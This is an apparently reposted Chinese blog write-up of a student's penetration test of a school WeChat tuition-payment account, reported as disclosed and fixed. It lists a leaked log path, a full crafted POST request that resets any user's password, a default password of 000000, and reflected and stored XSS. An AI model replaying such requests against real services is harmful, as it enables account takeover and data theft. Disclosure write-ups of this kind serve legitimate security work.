实战|针对学校公众号的一次渗透

admin 2022年12月8日13:24:10评论95 views字数 849阅读2分49秒阅读模式

0X01前言

这学期开学交学费的时候,学校开了一个公众号让我们去缴费,随手测试已提交并修复,水文一篇记录一下

0x02信息泄露

一些支付的订单和数据库的信息

xxxxxxxxx.com/wx/log/log.log

实战|针对学校公众号的一次渗透

0x03任意密码重置

通过忘记密码的页面

xxxxxxxx.com/toForgetSscret

查看源代码可以看到重置密码的数据包构造

实战|针对学校公众号的一次渗透

构造数据包,来重置20xxxxxxxxxx的密码

POST /updateP HTTP/1.1Host: xxxxxxxx.comContent-Length: 41Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"newp":"xX123456","yhbh":"20xxxxxxxxxx"}

发包成功重置
实战|针对学校公众号的一次渗透

0x04验证码绕过

虽然不痛不痒但是提一嘴,前端校验数据包内没有验证码字段,默认密码000000,或者重置密码后可以用随机openid来绑定这些账号让他们原主人绑定不上去也算危害

实战|针对学校公众号的一次渗透

0x05反射xss

在登入页面的显示头像的参数上过滤不严导出xss

实战|针对学校公众号的一次渗透

0x06存储xss

通过存在反射xss的链接去绑定他会存储头像,绑定成功后来到首页就弹窗转换为存储xss

实战|针对学校公众号的一次渗透

查看源代码

实战|针对学校公众号的一次渗透


作者:JunMo,转载于http://blog.mo60.cn/

注:如有侵权请联系删除
实战|针对学校公众号的一次渗透

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧。

原文始发于微信公众号(编码安全研究):实战|针对学校公众号的一次渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月8日13:24:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战|针对学校公众号的一次渗透https://cn-sec.com/archives/1451642.html

发表评论

匿名网友 填写信息